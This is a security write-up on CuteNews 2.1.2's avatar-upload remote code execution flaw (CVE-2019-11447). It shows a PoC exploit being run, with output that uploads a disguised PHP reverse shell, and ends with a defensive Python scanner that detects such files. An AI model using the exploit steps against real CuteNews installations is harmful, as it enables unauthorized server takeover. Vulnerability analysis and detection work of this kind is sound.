CuteNews

CuteNews is a lightweight, flat-file CMS designed primarily for managing and publishing news articles or blog posts without the need for a database backend. Developed in PHP, it stores content in plain text files, making it easier to deploy on minimal hosting environments. While its simplicity makes it attractive for small websites and personal blogs, its limited security mechanisms have led to multiple vulnerabilities over time.

Authenticated RCE

CuteNews version 2.1.2 is affected by an arbitrary file upload vulnerability (CVE-2019-11447). This flaw lies in the way the application handles avatar uploads in the user profile section. Specifically, the avatar_file parameter passed to index.php?mod=main&opt=personal allows an attacker to upload a malicious file disguised as an image. Due to insufficient validation of the $imgsize variable in /core/modules/dashboard.php, the application fails to properly inspect the uploaded file’s content. This enables an attacker to manipulate the file’s header—for instance, by adding a GIF file signature—to bypass content filters and achieve RCE. A working PoC is available:

$ python3 exploit.py -l http://cn-instance -u test123 -p test123 -e test@mail.com
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://cn-instance/uploads/avatar_test123_test123.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
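
A defensive triage sketch for the bypass described above (an added example, not code from CuteNews or from the PoC): it flags stored avatars whose name or content is executable PHP even though the file starts with a valid image signature. The function names, the extension list and the sample files are assumptions constructed for illustration.

```python
import os
import re

# Leading signatures of the image types an avatar should contain (GIF, PNG, JPEG).
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
# Extensions a PHP handler commonly executes (assumed list; match it to your server config).
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
PHP_OPEN = re.compile(rb"<\?php", re.IGNORECASE)

# Constructed sample files, not taken from a real system.
SAMPLES = {
    "avatar_alice_photo.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
    "avatar_test123_test123.php": b"GIF89a;\n<?php echo 'constructed marker'; ?>",
    "avatar_bob_notes.png": b"plain text, no image signature",
}


def classify_upload(name, data):
    """Return the reasons a stored avatar looks like a disguised script."""
    findings = []
    is_image = data.startswith(IMAGE_MAGIC)
    if EXEC_EXT.search(name):
        findings.append("executable-extension")
    if PHP_OPEN.search(data):
        findings.append("php-open-tag")
    if not is_image:
        findings.append("no-image-signature")
    elif findings:
        # Valid magic bytes in front of script content: the bypass described above.
        findings.append("image-signature-on-script")
    return findings


def scan_uploads(root):
    """Walk an uploads directory and return {path: findings} for suspicious files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                findings = classify_upload(fname, fh.read(1 << 20))  # first 1 MiB
            if findings:
                hits[path] = findings
    return hits


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, classify_upload(name, data) or "ok")
```

A magic-byte check alone passes the second sample, which is why the extension and content checks run independently of it.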
